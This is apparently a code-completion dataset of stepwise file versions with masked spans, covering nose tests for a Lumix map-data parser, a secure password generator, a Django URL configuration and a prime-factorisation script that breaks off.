"step-4": "import os\nimport nose\nimport lumixmaptool.copy as copy\n\n\ndef get_parser_test():\n \"\"\"Check if the evaluation model returns a parser object.\"\"\"\n copy.get_parser()\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, 'misc')\n maplistdata_path = os.path.join(misc_folder, 'MapList.dat')\n result = copy.parse_mapdata(maplistdata_path)\n expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',\n 'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',\n 'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [\n 'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',\n 'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',\n 'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',\n 'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',\n 'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [\n 'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',\n 'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',\n 'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',\n 'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',\n 'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',\n 'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',\n 'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',\n 'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',\n 'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',\n 'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',\n 'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',\n 'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',\n 'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',\n 'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',\n 'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',\n 'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',\n 'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',\n 'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',\n 'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',\n 'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',\n 'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',\n 'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',\n 'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',\n 'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',\n 'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',\n 'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [\n 'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [\n 'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',\n 'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',\n 'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',\n 'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',\n 'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',\n 'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',\n 'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',\n 'POI/P0000053.DFT', 'POI/P0000054.DFT']}}\n nose.tools.assert_equal(result, expected)\n",
"step-5": "#!/usr/bin/env python\n\n# Core Library modules\nimport os\n\n# Third party modules\nimport nose\n\n# First party modules\nimport lumixmaptool.copy as copy\n\n\n# Tests\ndef get_parser_test():\n \"\"\"Check if the evaluation model returns a parser object.\"\"\"\n copy.get_parser()\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, \"misc\")\n maplistdata_path = os.path.join(misc_folder, \"MapList.dat\")\n result = copy.parse_mapdata(maplistdata_path)\n expected = {\n \"num1\": \"00010001\",\n \"num2\": \"00010001\",\n \"regions\": {\n 1: [\n \"BACK/B0000035.DFT\",\n \"BACK/B0000036.DFT\",\n \"BACK/B0000044.DFT\",\n \"BACK/B0000045.DFT\",\n \"BACK/B0000053.DFT\",\n \"BACK/B0000054.DFT\",\n \"NAME/N0000035.DFT\",\n \"NAME/N0000036.DFT\",\n \"NAME/N0000044.DFT\",\n \"NAME/N0000045.DFT\",\n \"NAME/N0000053.DFT\",\n \"NAME/N0000054.DFT\",\n \"POI/P0000035.DFT\",\n \"POI/P0000036.DFT\",\n \"POI/P0000044.DFT\",\n \"POI/P0000045.DFT\",\n \"POI/P0000053.DFT\",\n \"POI/P0000054.DFT\",\n ],\n 2: [\n \"BACK/B0000024.DFT\",\n \"BACK/B0000025.DFT\",\n \"BACK/B0000026.DFT\",\n \"BACK/B0000027.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000034.DFT\",\n \"BACK/B0000035.DFT\",\n \"BACK/B0000036.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"BACK/B0000044.DFT\",\n \"BACK/B0000045.DFT\",\n \"NAME/N0000024.DFT\",\n \"NAME/N0000025.DFT\",\n \"NAME/N0000026.DFT\",\n \"NAME/N0000027.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000034.DFT\",\n \"NAME/N0000035.DFT\",\n \"NAME/N0000036.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"NAME/N0000044.DFT\",\n \"NAME/N0000045.DFT\",\n \"POI/P0000024.DFT\",\n \"POI/P0000025.DFT\",\n \"POI/P0000026.DFT\",\n \"POI/P0000027.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000034.DFT\",\n \"POI/P0000035.DFT\",\n \"POI/P0000036.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n \"POI/P0000044.DFT\",\n \"POI/P0000045.DFT\",\n ],\n 3: [\n \"BACK/B0000001.DFT\",\n \"BACK/B0000008.DFT\",\n \"BACK/B0000009.DFT\",\n \"BACK/B0000010.DFT\",\n \"BACK/B0000017.DFT\",\n \"BACK/B0000018.DFT\",\n \"BACK/B0000019.DFT\",\n \"BACK/B0000026.DFT\",\n \"BACK/B0000027.DFT\",\n \"NAME/N0000001.DFT\",\n \"NAME/N0000008.DFT\",\n \"NAME/N0000009.DFT\",\n \"NAME/N0000010.DFT\",\n \"NAME/N0000017.DFT\",\n \"NAME/N0000018.DFT\",\n \"NAME/N0000019.DFT\",\n \"NAME/N0000026.DFT\",\n \"NAME/N0000027.DFT\",\n \"POI/P0000017.DFT\",\n \"POI/P0000018.DFT\",\n \"POI/P0000019.DFT\",\n \"POI/P0000026.DFT\",\n \"POI/P0000027.DFT\",\n ],\n 4: [\n \"BACK/B0000019.DFT\",\n \"BACK/B0000020.DFT\",\n \"BACK/B0000021.DFT\",\n \"BACK/B0000022.DFT\",\n \"BACK/B0000027.DFT\",\n \"BACK/B0000028.DFT\",\n \"BACK/B0000029.DFT\",\n \"BACK/B0000030.DFT\",\n \"BACK/B0000031.DFT\",\n \"BACK/B0000036.DFT\",\n \"BACK/B0000037.DFT\",\n \"BACK/B0000038.DFT\",\n \"BACK/B0000039.DFT\",\n \"BACK/B0000040.DFT\",\n \"BACK/B0000045.DFT\",\n \"BACK/B0000046.DFT\",\n \"BACK/B0000047.DFT\",\n \"BACK/B0000048.DFT\",\n \"BACK/B0000049.DFT\",\n \"BACK/B0000054.DFT\",\n \"NAME/N0000019.DFT\",\n \"NAME/N0000020.DFT\",\n \"NAME/N0000021.DFT\",\n \"NAME/N0000022.DFT\",\n \"NAME/N0000027.DFT\",\n \"NAME/N0000028.DFT\",\n \"NAME/N0000029.DFT\",\n \"NAME/N0000030.DFT\",\n \"NAME/N0000031.DFT\",\n \"NAME/N0000036.DFT\",\n \"NAME/N0000037.DFT\",\n \"NAME/N0000038.DFT\",\n \"NAME/N0000039.DFT\",\n \"NAME/N0000040.DFT\",\n \"NAME/N0000045.DFT\",\n \"NAME/N0000046.DFT\",\n \"NAME/N0000047.DFT\",\n \"NAME/N0000048.DFT\",\n \"NAME/N0000049.DFT\",\n \"NAME/N0000054.DFT\",\n \"POI/P0000019.DFT\",\n \"POI/P0000020.DFT\",\n \"POI/P0000021.DFT\",\n \"POI/P0000022.DFT\",\n \"POI/P0000027.DFT\",\n \"POI/P0000028.DFT\",\n \"POI/P0000029.DFT\",\n \"POI/P0000030.DFT\",\n \"POI/P0000031.DFT\",\n \"POI/P0000036.DFT\",\n \"POI/P0000037.DFT\",\n \"POI/P0000038.DFT\",\n \"POI/P0000039.DFT\",\n \"POI/P0000040.DFT\",\n \"POI/P0000045.DFT\",\n \"POI/P0000046.DFT\",\n \"POI/P0000047.DFT\",\n \"POI/P0000048.DFT\",\n \"POI/P0000049.DFT\",\n \"POI/P0000054.DFT\",\n ],\n 5: [\n \"BACK/B0000002.DFT\",\n \"BACK/B0000003.DFT\",\n \"BACK/B0000004.DFT\",\n \"BACK/B0000011.DFT\",\n \"BACK/B0000012.DFT\",\n \"BACK/B0000013.DFT\",\n \"BACK/B0000020.DFT\",\n \"BACK/B0000021.DFT\",\n \"BACK/B0000022.DFT\",\n \"BACK/B0000029.DFT\",\n \"BACK/B0000030.DFT\",\n \"BACK/B0000031.DFT\",\n \"NAME/N0000002.DFT\",\n \"NAME/N0000003.DFT\",\n \"NAME/N0000004.DFT\",\n \"NAME/N0000011.DFT\",\n \"NAME/N0000012.DFT\",\n \"NAME/N0000013.DFT\",\n \"NAME/N0000020.DFT\",\n \"NAME/N0000021.DFT\",\n \"NAME/N0000022.DFT\",\n \"NAME/N0000029.DFT\",\n \"NAME/N0000030.DFT\",\n \"NAME/N0000031.DFT\",\n \"POI/P0000003.DFT\",\n \"POI/P0000011.DFT\",\n \"POI/P0000012.DFT\",\n \"POI/P0000013.DFT\",\n \"POI/P0000020.DFT\",\n \"POI/P0000021.DFT\",\n \"POI/P0000022.DFT\",\n \"POI/P0000029.DFT\",\n \"POI/P0000030.DFT\",\n \"POI/P0000031.DFT\",\n ],\n 6: [\n \"BACK/B0000040.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000049.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"NAME/N0000040.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000049.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"POI/P0000040.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000049.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n ],\n 7: [\n \"BACK/B0000032.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000034.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"BACK/B0000052.DFT\",\n \"NAME/N0000032.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000034.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"NAME/N0000052.DFT\",\n \"POI/P0000032.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000034.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n \"POI/P0000052.DFT\",\n ],\n 8: [\n \"BACK/B0000031.DFT\",\n \"BACK/B0000032.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000040.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000049.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"NAME/N0000031.DFT\",\n \"NAME/N0000032.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000040.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000049.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"POI/P0000031.DFT\",\n \"POI/P0000032.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000040.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000049.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n ],\n 9: [\n \"BACK/B0000005.DFT\",\n \"BACK/B0000006.DFT\",\n \"BACK/B0000007.DFT\",\n \"BACK/B0000014.DFT\",\n \"BACK/B0000015.DFT\",\n \"BACK/B0000016.DFT\",\n \"BACK/B0000023.DFT\",\n \"BACK/B0000024.DFT\",\n \"BACK/B0000025.DFT\",\n \"BACK/B0000032.DFT\",\n \"BACK/B0000033.DFT\",\n \"BACK/B0000034.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"NAME/N0000005.DFT\",\n \"NAME/N0000006.DFT\",\n \"NAME/N0000007.DFT\",\n \"NAME/N0000014.DFT\",\n \"NAME/N0000015.DFT\",\n \"NAME/N0000016.DFT\",\n \"NAME/N0000023.DFT\",\n \"NAME/N0000024.DFT\",\n \"NAME/N0000025.DFT\",\n \"NAME/N0000032.DFT\",\n \"NAME/N0000033.DFT\",\n \"NAME/N0000034.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"POI/P0000014.DFT\",\n \"POI/P0000015.DFT\",\n \"POI/P0000023.DFT\",\n \"POI/P0000024.DFT\",\n \"POI/P0000025.DFT\",\n \"POI/P0000032.DFT\",\n \"POI/P0000033.DFT\",\n \"POI/P0000034.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n ],\n 10: [\n \"BACK/B0000037.DFT\",\n \"BACK/B0000041.DFT\",\n \"BACK/B0000042.DFT\",\n \"BACK/B0000043.DFT\",\n \"BACK/B0000044.DFT\",\n \"BACK/B0000045.DFT\",\n \"BACK/B0000046.DFT\",\n \"BACK/B0000050.DFT\",\n \"BACK/B0000051.DFT\",\n \"BACK/B0000052.DFT\",\n \"BACK/B0000053.DFT\",\n \"BACK/B0000054.DFT\",\n \"NAME/N0000037.DFT\",\n \"NAME/N0000041.DFT\",\n \"NAME/N0000042.DFT\",\n \"NAME/N0000043.DFT\",\n \"NAME/N0000044.DFT\",\n \"NAME/N0000045.DFT\",\n \"NAME/N0000046.DFT\",\n \"NAME/N0000050.DFT\",\n \"NAME/N0000051.DFT\",\n \"NAME/N0000052.DFT\",\n \"NAME/N0000053.DFT\",\n \"NAME/N0000054.DFT\",\n \"POI/P0000037.DFT\",\n \"POI/P0000041.DFT\",\n \"POI/P0000042.DFT\",\n \"POI/P0000043.DFT\",\n \"POI/P0000044.DFT\",\n \"POI/P0000045.DFT\",\n \"POI/P0000046.DFT\",\n \"POI/P0000050.DFT\",\n \"POI/P0000051.DFT\",\n \"POI/P0000052.DFT\",\n \"POI/P0000053.DFT\",\n \"POI/P0000054.DFT\",\n ],\n },\n }\n nose.tools.assert_equal(result, expected)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
password = ''.join(secrets.choice(alphabets) for i in range(10))
if any(c.islower() for c in password) and any(c.isupper() for c in password
) and sum(c.isdigit() for c in password) >= 3:
print(password)
break
<|reserved_special_token_1|>
<|reserved_special_token_0|>
alphabets = string.ascii_letters + string.digits
while True:
password = ''.join(secrets.choice(alphabets) for i in range(10))
if any(c.islower() for c in password) and any(c.isupper() for c in password
) and sum(c.isdigit() for c in password) >= 3:
print(password)
break
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import secrets
import string
alphabets = string.ascii_letters + string.digits
while True:
password = ''.join(secrets.choice(alphabets) for i in range(10))
if any(c.islower() for c in password) and any(c.isupper() for c in password
) and sum(c.isdigit() for c in password) >= 3:
print(password)
break
<|reserved_special_token_1|>
'''
Generate a ten-character alphanumeric password with at least one lowercase,
at least one uppercase character, and at least three digits
'''
import secrets
import string
alphabets = string.ascii_letters + string.digits
while True:
password = "".join(secrets.choice(alphabets) for i in range(10))
if(any(c.islower() for c in password) and
any(c.isupper() for c in password) and
sum(c.isdigit() for c in password) >= 3):
print(password)
break
|
flexible
|
{
"blob_id": "0c283cd31203291da24226a0eae781bd397e84d4",
"index": 9526,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n password = ''.join(secrets.choice(alphabets) for i in range(10))\n if any(c.islower() for c in password) and any(c.isupper() for c in password\n ) and sum(c.isdigit() for c in password) >= 3:\n print(password)\n break\n",
"step-3": "<mask token>\nalphabets = string.ascii_letters + string.digits\nwhile True:\n password = ''.join(secrets.choice(alphabets) for i in range(10))\n if any(c.islower() for c in password) and any(c.isupper() for c in password\n ) and sum(c.isdigit() for c in password) >= 3:\n print(password)\n break\n",
"step-4": "<mask token>\nimport secrets\nimport string\nalphabets = string.ascii_letters + string.digits\nwhile True:\n password = ''.join(secrets.choice(alphabets) for i in range(10))\n if any(c.islower() for c in password) and any(c.isupper() for c in password\n ) and sum(c.isdigit() for c in password) >= 3:\n print(password)\n break\n",
"step-5": "'''\r\nGenerate a ten-character alphanumeric password with at least one lowercase,\r\nat least one uppercase character, and at least three digits\r\n'''\r\nimport secrets\r\nimport string\r\nalphabets = string.ascii_letters + string.digits\r\nwhile True:\r\n password = \"\".join(secrets.choice(alphabets) for i in range(10))\r\n if(any(c.islower() for c in password) and\r\n any(c.isupper() for c in password) and\r\n sum(c.isdigit() for c in password) >= 3):\r\n print(password)\r\n break\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'blog.urls', namespace='blog')), url('^hello/([0-9]{4})/$', view.hello),
url('^ifor/', view.ifor)]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url
from . import view
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'blog.urls', namespace='blog')), url('^hello/([0-9]{4})/$', view.hello),
url('^ifor/', view.ifor)]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
"""helloworld URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
https://docs.djangoproject.com/zh-hans/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
#example:
# python3.0
from django.contrib import admin
# 为何要用 path呢
from django.urls import path, include
from django.conf.urls import url
from . import view
# 如何链接其他文件模块下的路径呢
#
urlpatterns = [
# path('hello/', view.hello),
# path('hello/<int:year>/', view.hello), # hello()中要有对应的参数
# path('ifor/', view.ifor),
path('admin/', admin.site.urls),
# path('blog/', blog.views.goodbye),
# path('', include('blog.urls.py', namespace='blog')), # 错误
path('', include('blog.urls', namespace='blog')),
# url(r'^hello/$', view.hello),
url(r'^hello/([0-9]{4})/$', view.hello),
url(r'^ifor/', view.ifor),
# url(r'^blog/', 'blog.views.goodbye')
#
]
"""
# python 2.7
from django.conf.urls import url
from . import view
urlpatterns = [
url(r'^$', view.hello),
]
"""
|
flexible
|
{
"blob_id": "a470aad80e47b244811e4d9aed4a630ba36a8daf",
"index": 4112,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'blog.urls', namespace='blog')), url('^hello/([0-9]{4})/$', view.hello),\n url('^ifor/', view.ifor)]\n<mask token>\n",
"step-3": "<mask token>\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom . import view\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'blog.urls', namespace='blog')), url('^hello/([0-9]{4})/$', view.hello),\n url('^ifor/', view.ifor)]\n<mask token>\n",
"step-4": "\"\"\"helloworld URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\n https://docs.djangoproject.com/zh-hans/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\n\"\"\"\n#example:\n\n# python3.0\nfrom django.contrib import admin\n\n# 为何要用 path呢\nfrom django.urls import path, include\n\nfrom django.conf.urls import url\n\nfrom . import view\n\n# 如何链接其他文件模块下的路径呢\n# \nurlpatterns = [\n\t# path('hello/', view.hello),\n \n # path('hello/<int:year>/', view.hello), # hello()中要有对应的参数\n\t# path('ifor/', view.ifor),\n path('admin/', admin.site.urls),\n # path('blog/', blog.views.goodbye),\n # path('', include('blog.urls.py', namespace='blog')), # 错误\n path('', include('blog.urls', namespace='blog')),\n # url(r'^hello/$', view.hello),\n url(r'^hello/([0-9]{4})/$', view.hello),\n url(r'^ifor/', view.ifor),\n # url(r'^blog/', 'blog.views.goodbye')\n # \n \n\n]\n\n\"\"\"\n# python 2.7\nfrom django.conf.urls import url\n \nfrom . import view\n \nurlpatterns = [\n url(r'^$', view.hello),\n]\n\"\"\"",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while num > 1:
for i in range(2, num + 1):
if num % i == 0:
a.append(i)
num = num // i
break
print('%d =' % original, end='')
for i in range(len(a) - 1):
print(a[i], end='*')
print(a[len(a) - 1])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
num = int(input('请输入一个整数:'))
original = num
a = []
while num > 1:
for i in range(2, num + 1):
if num % i == 0:
a.append(i)
num = num // i
break
print('%d =' % original, end='')
